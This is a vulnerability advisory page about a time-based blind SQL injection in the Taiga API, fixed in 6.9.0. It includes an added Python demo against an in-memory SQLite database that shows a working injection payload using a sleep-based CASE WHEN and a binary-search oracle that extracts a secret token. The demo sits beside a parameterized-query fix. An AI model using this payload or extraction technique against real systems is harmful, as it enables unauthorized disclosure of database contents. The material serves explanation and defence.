Taiga API Time-Based Blind SQL Injection Vulnerability Allowing Sensitive Data Disclosure
Vulnerability
A time-based blind SQL injection vulnerability has been identified in the Taiga API, affecting versions up to and including 6.8.3. The injected SQL returns no visible output or error, so an attacker extracts data indirectly: a payload makes the database pause only when a chosen condition about the data is true, and the attacker reads the answer from how long the response takes. The issue has been addressed in version 6.9.0.
Impact
Exploitation of this vulnerability could lead to unauthorized disclosure of data held in the application's database. Because the only feedback channel is response time, extraction is slow (roughly one bit or character per request), but it needs no error message or reflected output; an attacker only has to be able to send requests to the affected endpoint and time the replies.
Remediation
Upgrade to Taiga version 6.9.0 or later. The advisory lists no workaround for earlier versions.
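The following is an added example, written for this page and not code from Taiga or from the advisory, which does not disclose the affected endpoint or query. It shows the mechanism described above on a constructed SQLite database: the vulnerable string-built query, the hardened parameterized query, and a time-based oracle that recovers a value character by character purely from response delays. The table, column names, token value and the registered sleep() function (standing in for PostgreSQL's pg_sleep() or MySQL's SLEEP()) are all assumptions made for the demonstration.

```python
import sqlite3
import time

# Constructed stand-in for the application's database. The table, column names
# and the token value are invented for this example; they are not Taiga's schema.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, api_token TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'admin', 'S3cr3t')")
    # SQLite has no sleep(); register one so the demo can emulate pg_sleep() /
    # SLEEP(), which is what a real time-based payload calls.
    conn.create_function("sleep", 1, lambda seconds: time.sleep(seconds) or 0)
    return conn


def lookup_vulnerable(conn, username):
    # VULNERABLE pattern: user input is spliced into the SQL text.
    sql = "SELECT id FROM users WHERE username = '%s'" % username
    return conn.execute(sql).fetchall()


def lookup_fixed(conn, username):
    # Hardened pattern: the value travels as a bound parameter, never as SQL text.
    sql = "SELECT id FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


def timed(fn, *args):
    """Seconds the call took; errors are swallowed because a blind attacker sees none."""
    start = time.perf_counter()
    try:
        fn(*args)
    except sqlite3.Error:
        pass
    return time.perf_counter() - start


DELAY = 0.1  # seconds the injected branch sleeps when the condition is true


def probe(conn, lookup, condition):
    """True if CONDITION held inside the database, judged only from response time."""
    payload = "x' OR (CASE WHEN (%s) THEN sleep(%g) ELSE 0 END) --" % (condition, DELAY)
    return timed(lookup, conn, payload) >= DELAY / 2


def leak_char(conn, lookup, pos):
    """Recover one character of the admin token by binary search on its code point."""
    code = "(SELECT unicode(substr(api_token, %d, 1)) FROM users WHERE id = 1)" % pos
    if not probe(conn, lookup, code + " >= 32"):
        return None  # past the end of the string, or the endpoint is not injectable
    lo, hi = 32, 126  # printable ASCII range
    while lo < hi:
        mid = (lo + hi) // 2
        if probe(conn, lookup, "%s > %d" % (code, mid)):
            lo = mid + 1
        else:
            hi = mid
    return chr(lo)


def leak_token(conn, lookup, max_len=32):
    """Extract the token one character per binary search; empty result means no leak."""
    out = ""
    for pos in range(1, max_len + 1):
        ch = leak_char(conn, lookup, pos)
        if ch is None:
            break
        out += ch
    return out


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", repr(leak_token(db, lookup_vulnerable)))
    print("fixed:     ", repr(leak_token(db, lookup_fixed)))
```

Against lookup_vulnerable the oracle recovers the full token with about eight timed requests per character and never sees a single byte of query output, which is why the attack works even when the endpoint returns nothing useful. Against lookup_fixed the same payload is just an unusual username string, the first probe never delays, and extraction stops immediately; binding parameters, not filtering sleep keywords, is the fix.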
Added: Oct 28, 2025, 8:18 PM
Updated: Oct 28, 2025, 8:18 PM
Vulnerability Rating
Custom Algorithm
spread: 0.0
impact: 2.5
exploitability: 5.2
remediation: 7.7
relevance: 0.8
threat: 0.0
urgency: 2.9
incentive: 1.7
Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.
